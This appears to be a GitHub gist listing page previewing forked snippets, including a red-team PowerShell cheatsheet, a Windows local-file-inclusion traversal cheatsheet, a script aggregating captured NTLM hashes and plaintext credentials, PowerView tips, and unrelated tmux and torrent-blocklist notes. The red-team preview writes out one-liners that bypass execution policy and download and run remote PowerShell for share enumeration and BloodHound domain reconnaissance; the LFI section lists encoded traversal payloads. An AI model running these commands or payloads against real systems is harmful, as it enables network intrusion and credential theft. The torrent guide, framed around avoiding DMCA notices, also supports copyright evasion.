Skip to content

Instantly share code, notes, and snippets.

View PixelZA's full-sized avatar

PixelZA

3 followers · 4 following
View GitHub Profile
@PixelZA
PixelZA / venom_security_headers_tests_suite.yml
Created January 5, 2022 11:29 — forked from righettod/venom_security_headers_tests_suite.yml
VENOM sample HTTP security response headers test suites.
name: HTTP security response headers test suites
# TOOLS
# VENOM HOME: https://github.com/ovh/venom
# VENOM RELEASE: https://github.com/ovh/venom/releases
# VENOM ASSERTION KEYWORDS: https://github.com/ovh/venom#assertion
# REF AND RUN
# REF BASE: https://owasp.org/www-project-secure-headers/
# RUN CMD: venom run --var="target_site=https://righettod.eu" venom_security_headers_tests_suite.yml
# venom run --var="target_site=https://righettod.eu" --var="internet_facing=true" venom_security_headers_tests_suite.yml
# venom run --var="target_site=https://righettod.eu" --var="internet_facing=true" --var="logout_url=/logout" venom_security_headers_tests_suite.yml
@PixelZA
PixelZA / lfi_windows.txt
Created November 14, 2021 18:55 — forked from korrosivesec/lfi_windows.txt
[LFI - Windows Cheatsheet]
Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
Traversal encoding:
===================
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
@PixelZA
PixelZA / torrents.md
Created December 28, 2020 15:09 — forked from shmup/torrents.md
transmission blocklist guide

Transmission Blocklist

The Transmission torrent client has an option to set a Blocklist, which helps protect you from getting caught and having the DMCA send a letter/email.

It's as simple as downloading and installing the latest client:

@PixelZA
PixelZA / gather.sh
Created November 2, 2020 12:49 — forked from seajaysec/gather.sh
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and NTLMRelayX.py into aggregate files of hashes and plaintext output
#!/bin/bash
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
OUTDIR=${HOME}'/working/loot/gathered'
# Hardcoded location for ntlmrelayx's .sam file output directory
NTLMRELAY=${HOME}'/working/loot/ntlmrelay'
@PixelZA
PixelZA / RedTeam_CheatSheet.ps1
Created May 25, 2020 19:25 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@PixelZA
PixelZA / PowerView-3.0-tricks.ps1
Created January 27, 2020 08:41 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@PixelZA
PixelZA / README.MD
Created September 3, 2019 12:29 — forked from nzec/README.MD
DeezLoader Offical Page

Deezloader Remix

(Recommended)

Available for macOS, Linux, Windows.

In the process of a rewrite. Final release will be v4.2.0. The repository might get DMCA' so, make Git Clones/Forks
You can compile yourself now to test for bugs (See rewrite branch in the Git repository)

@PixelZA
PixelZA / SimpleHTTPServerWithUpload.py
Created February 22, 2019 07:46 — forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
@PixelZA
PixelZA / tmux-cheats.md
Created January 30, 2019 10:21 — forked from Starefossen/tmux-cheats.md
My personal tmux cheat sheet for working with sessions, windows, and panes. `NB` I have remapped the command prefix to `ctrl` + `a`.

Sessions

New Session

  • tmux new [-s name] [cmd] (:new) - new session

Switch Session

  • tmux ls (:ls) - list sessions
  • tmux switch [-t name] (:switch) - switches to an existing session
@PixelZA
PixelZA / tmux_cheatsheet.markdown
Created January 30, 2019 10:21 — forked from henrik/tmux_cheatsheet.markdown
tmux cheatsheet

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name: